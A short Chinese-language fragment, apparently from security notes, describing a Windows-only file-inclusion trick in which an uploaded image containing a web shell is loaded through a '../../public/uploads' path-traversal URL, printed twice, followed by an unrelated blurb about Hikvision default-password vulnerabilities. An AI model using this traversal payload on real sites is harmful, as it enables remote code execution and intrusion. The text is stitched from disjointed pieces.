Windows下可用,Linux下不太行。原理就是因为Windows那倒了血霉的路径斜杠问题。 总结:上传图片马,然后该路径包含 http://www.demo.com/index.php/index/user/_empty?name=../../public/uploads/xxxxx/xxxxx.jpg
http://www.demo.com/index.php/index/user/_empty?name=../../public/uploads/xxxxx/xxxxx.jpg
本文从海康威视的默认密码开始,介绍了常见的几个海康威视的洞
给出了分析,并给出了payload该怎么构建,还没有研究。
部分利用点被打码,感觉需要自己挖掘一下